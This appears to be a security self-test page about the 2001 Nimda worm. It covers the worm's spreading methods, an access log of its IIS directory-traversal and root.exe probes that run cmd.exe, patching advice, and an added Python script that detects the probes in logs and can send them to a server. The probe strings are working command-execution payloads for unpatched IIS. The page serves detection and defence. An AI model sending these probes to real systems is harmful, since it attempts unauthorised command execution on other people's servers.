Nimda Self Test
What is the Nimda Worm?

The Nimda worm, also known as W32.Nimda.A@mm, Code Rainbow, Minda and Nimbda,
is a self-replicating piece of software that infects IIS web servers as well as
users running Internet Explorer 5. It was first seen in the wild on Tuesday,
September 18th, 2001, at around 9 a.m. The worm propagates in at least four
different ways:
- Scanning for IIS web servers and trying a series of known IIS holes against
each one: the Unicode directory-traversal and double-decode bugs in IIS, and
the root.exe backdoor and /c and /d virtual roots left behind by earlier worms
(the sadmind/IIS worm and Code Red II). A server taken over this way
immediately begins its own attack cycle.
- Modification of web pages on an infected server: when such a page is viewed
with an unpatched IE 5, the script the worm appends causes IE to execute the
worm and infect the user's system. Note: the user does not need to be running
IIS.
- Harvesting of mail addresses from address books and cached web pages on
infected user systems, then mailing itself as an attachment to those
addresses; on an unpatched Outlook/IE the attachment executes as soon as the
message is opened or previewed.
- Propagation over Windows file sharing, copying itself to open network
shares, that is, shares reachable as the Guest user or with no password set.
This worm is reported to be extremely aggressive in its scanning, and
according to various alerts it is spreading rapidly.
Signature

The worm checks each system it finds for a number of different possible entry
points. The following access-log extract is from an Apache system being
actively scanned by infected hosts. The requests only make sense against IIS
(this Apache server answered them with a 302 redirect), but each one is a
recognisable Nimda probe: the first two look for the root.exe copy of cmd.exe
left behind by Code Red II and the sadmind/IIS worm, the next two go through
the /c and /d virtual roots that Code Red II maps to the C: and D: drives, the
"..%255c.." lines use the IIS double-decode bug (%255c decodes to %5c and then
to a backslash), and the "..%c1%1c..", "..%c0%af.." and "..%c1%9c.." lines use
the IIS Unicode directory-traversal bug (malformed UTF-8 sequences that IIS
decodes to / or \):
"GET /scripts/root.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
Test Me Now

If you are running your browser on the same system as your web server, simply
click the following button to determine whether your web server is susceptible
to, or has already been exploited by, the Nimda worm.
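The signature above and the self-test this page offers, written out as a script. This is an added example, not code from the original page: it classifies the probe requests from the log extract when they appear in Apache access-log lines, and it can send the same ten probes to a server you own and report which of them actually returned the output of "dir", which is the page's "have I been exploited?" check. The log format is assumed to be Apache common log format, the sample lines and their 192.0.2.10 / 198.51.100.7 addresses are constructed here, and the names classify, scan_log, self_test and http_fetch are this example's own. The classifier decodes the path twice before matching, so it goes beyond the ten exact strings on the page and also catches re-encoded variants of the same probes.

```python
"""Nimda probe detection over Apache access-log lines, plus a self-test that
sends the page's probe URIs to a server you own.  Added example, not the
page's code; SAMPLE_LOG, its addresses and all names here are constructed."""
import re
from urllib.parse import unquote_to_bytes

# Request targets copied from the log extract on the page.
NIMDA_PROBES = [
    "/scripts/root.exe?/c+dir",
    "/MSADC/root.exe?/c+dir",
    "/c/winnt/system32/cmd.exe?/c+dir",
    "/d/winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
]

# Apache common log format: host ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3})')
# Malformed / overlong UTF-8 (%c0%af, %c1%9c, %c1%1c) that IIS decoded as / or \.
UNICODE_TRAVERSAL = re.compile(rb"%c[01]%[0-9a-f]{2}", re.I)


def classify(target):
    """Return the Nimda probe family for a request target, or None.
    Every probe runs cmd.exe (or its root.exe copy) with "/c dir"; the families
    differ in how cmd.exe is reached: backdoor (root.exe left by Code Red II or
    sadmind/IIS), virtual-root (/c/, /d/ created by Code Red II), double-decode
    (..%255c.., decoded twice: %255c -> %5c -> \) and unicode (..%c0%af.. style).
    The path is percent-decoded twice first, so re-encoded variants still match."""
    path, _, query = target.partition("?")
    raw = path.encode("latin-1", "replace")
    decoded = unquote_to_bytes(unquote_to_bytes(raw)).lower()
    if not query.lower().startswith("/c"):
        return None
    if b"root.exe" in decoded:
        return "backdoor"
    if b"cmd.exe" not in decoded:
        return None
    if b"%25" in raw.lower():
        return "double-decode"
    if UNICODE_TRAVERSAL.search(raw):
        return "unicode"
    if re.match(rb"/[cd]/", decoded):
        return "virtual-root"
    return "cmd.exe"


def scan_log(lines):
    """Return (host, family, status, target) for every probe found in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        family = classify(m.group("target"))
        if family:
            hits.append((m.group("host"), family, int(m.group("status")), m.group("target")))
    return hits


# Constructed sample log: one infected scanner and one ordinary client.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:09:07:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 209
192.0.2.10 - - [18/Sep/2001:09:07:11 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 209
192.0.2.10 - - [18/Sep/2001:09:07:12 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209
192.0.2.10 - - [18/Sep/2001:09:07:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209
192.0.2.10 - - [18/Sep/2001:09:07:13 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209
198.51.100.7 - - [18/Sep/2001:09:08:02 -0400] "GET /index.html HTTP/1.1" 200 1043
198.51.100.7 - - [18/Sep/2001:09:08:03 -0400] "GET /scripts/../../etc/passwd HTTP/1.1" 404 312
""".splitlines()

# Banner lines that "cmd.exe /c dir" prints on NT.
DIR_MARKERS = ("Volume in drive", "Directory of", "<DIR>")


def self_test(fetch):
    """Send every probe through fetch(target) -> (status, body) and return the
    targets whose body looks like a directory listing, i.e. the server ran the
    command.  A 200 alone is not proof (custom not-found pages return 200 too)."""
    executed = []
    for target in NIMDA_PROBES:
        status, body = fetch(target)
        if status == 200 and any(marker in body for marker in DIR_MARKERS):
            executed.append(target)
    return executed


def http_fetch(host, port=80, timeout=5.0):
    """fetch() for self_test over plain HTTP; the target is sent verbatim so the
    encoded traversal is not normalised on the way (a browser may rewrite '..')."""
    import http.client

    def fetch(target):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", target, headers={"Host": host})
            resp = conn.getresponse()
            return resp.status, resp.read().decode("latin-1", "replace")
        finally:
            conn.close()
    return fetch


if __name__ == "__main__":
    for host, family, status, target in scan_log(SAMPLE_LOG):
        print(f"{host:14} {family:13} {status} {target}")
    # On the web server itself, as the page suggests: self_test(http_fetch("localhost"))
```

Run against a real access log, `scan_log` gives one row per probe with the source host, so a single host producing several families within a second is an infected machine doing its scan, not a curious user. Only run `self_test` against a server you are responsible for: each probe asks the server to execute `dir`, which is exactly what the worm does, and a non-empty result means cmd.exe is reachable and the box must be treated as compromised, not merely unpatched.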
How Do I Stop It?

We recommend that IIS administrators upgrade to the latest version of IIS and
apply all outstanding security patches, in particular the fixes for the
Unicode directory-traversal and double-decode bugs the worm exploits
(Microsoft bulletins MS00-078 and MS01-026), and check for and remove any
root.exe copies and /c or /d virtual directories left behind by earlier worms.
Users of Internet Explorer should also update their browsers, since the
web-page and e-mail infection routes rely on an unpatched IE 5 (the MIME-header
bug fixed in MS01-020).
References

Incidents.org
TruSecure
Symantec
Newsbytes
F-Secure
Sophos